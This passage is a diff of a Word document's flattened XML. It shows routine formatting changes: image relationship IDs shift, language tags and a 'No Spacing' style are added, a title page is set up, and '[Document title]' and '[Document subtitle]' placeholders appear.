           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -12053,7 +12565,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId137" cstate="print">
+                    <a:blip r:embed="rId139" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12130,6 +12642,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -12150,7 +12663,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId138">
+                    <a:blip r:embed="rId140">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12327,6 +12840,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -12346,7 +12860,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId139">
+                    <a:blip r:embed="rId141">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12503,6 +13017,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -12522,7 +13037,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId140">
+                    <a:blip r:embed="rId142">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12706,6 +13221,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -12725,7 +13241,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId141">
+                    <a:blip r:embed="rId143">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12768,7 +13284,9 @@
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
+      <w:pgNumType w:start="0"/>
       <w:cols w:space="708"/>
+      <w:titlePg/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
@@ -18017,6 +18535,31 @@
     <w:name w:val="ilfuvd"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="00B43D45"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NoSpacing">
+    <w:name w:val="No Spacing"/>
+    <w:link w:val="NoSpacingChar"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00921989"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
+    <w:name w:val="No Spacing Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="NoSpacing"/>
+    <w:uiPriority w:val="1"/>
+    <w:rsid w:val="00921989"/>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -19235,7 +19778,7 @@
   <dgm:whole/>
   <dgm:extLst>
     <a:ext uri="http://schemas.microsoft.com/office/drawing/2008/diagram">
-      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId127" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
+      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId129" minVer="http://schemas.openxmlformats.org/drawingml/2006/diagram"/>
     </a:ext>
   </dgm:extLst>
 </dgm:dataModel>
@@ -21301,6 +21844,70 @@
         </w:p>
       </w:docPartBody>
     </w:docPart>
+    <w:docPart>
+      <w:docPartPr>
+        <w:name w:val="D90DBDEE5C78429BA6FF8C03C4C806AC"/>
+        <w:category>
+          <w:name w:val="General"/>
+          <w:gallery w:val="placeholder"/>
+        </w:category>
+        <w:types>
+          <w:type w:val="bbPlcHdr"/>
+        </w:types>
+        <w:behaviors>
+          <w:behavior w:val="content"/>
+        </w:behaviors>
+        <w:guid w:val="{55FEAC9F-2443-439D-8BE6-24510CD229AA}"/>
+      </w:docPartPr>
+      <w:docPartBody>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="D90DBDEE5C78429BA6FF8C03C4C806AC"/>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+              <w:caps/>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+              <w:sz w:val="80"/>
+              <w:szCs w:val="80"/>
+            </w:rPr>
+            <w:t>[Document title]</w:t>
+          </w:r>
+        </w:p>
+      </w:docPartBody>
+    </w:docPart>
+    <w:docPart>
+      <w:docPartPr>
+        <w:name w:val="E4CE395554CC4730A52199F79156BCC9"/>
+        <w:category>
+          <w:name w:val="General"/>
+          <w:gallery w:val="placeholder"/>
+        </w:category>
+        <w:types>
+          <w:type w:val="bbPlcHdr"/>
+        </w:types>
+        <w:behaviors>
+          <w:behavior w:val="content"/>
+        </w:behaviors>
+        <w:guid w:val="{0C584632-899E-46F2-9DC3-01D81A987369}"/>
+      </w:docPartPr>
+      <w:docPartBody>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="E4CE395554CC4730A52199F79156BCC9"/>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+            <w:t>[Document subtitle]</w:t>
+          </w:r>
+        </w:p>
+      </w:docPartBody>
+    </w:docPart>
   </w:docParts>
 </w:glossaryDocument>
 </file>
@@ -21340,7 +21947,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Calibri Light">
     <w:panose1 w:val="020F0302020204030204"/>
@@ -21369,6 +21976,7 @@
     <w:rsidRoot w:val="008849E7"/>
     <w:rsid w:val="000337AC"/>
     <w:rsid w:val="000659A0"/>
+    <w:rsid w:val="000C7773"/>
     <w:rsid w:val="001A5E18"/>
     <w:rsid w:val="001F547F"/>
     <w:rsid w:val="00234847"/>
@@ -21384,6 +21992,7 @@
     <w:rsid w:val="00901D3A"/>
     <w:rsid w:val="00A418DD"/>
     <w:rsid w:val="00BC42A6"/>
+    <w:rsid w:val="00D556F1"/>
     <w:rsid w:val="00D90DF0"/>
     <w:rsid w:val="00E64DFA"/>
   </w:rsids>
@@ -21840,6 +22449,20 @@
     <w:name w:val="5A3F63E276E049D6B2F948062AEC18C4"/>
     <w:rsid w:val="008849E7"/>
   </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D90DBDEE5C78429BA6FF8C03C4C806AC">
+    <w:name w:val="D90DBDEE5C78429BA6FF8C03C4C806AC"/>
+    <w:rsid w:val="00D556F1"/>
+    <w:rPr>
+      <w:lang w:val="en-US" w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E4CE395554CC4730A52199F79156BCC9">
+    <w:name w:val="E4CE395554CC4730A52199F79156BCC9"/>
+    <w:rsid w:val="00D556F1"/>
+    <w:rPr>
+      <w:lang w:val="en-US" w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -22116,7 +22739,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FF8DDDCB-BF9B-45F8-A527-4931F6DB1D6D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4A7E2D9A-9292-40EA-851C-EB59451A9D81}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
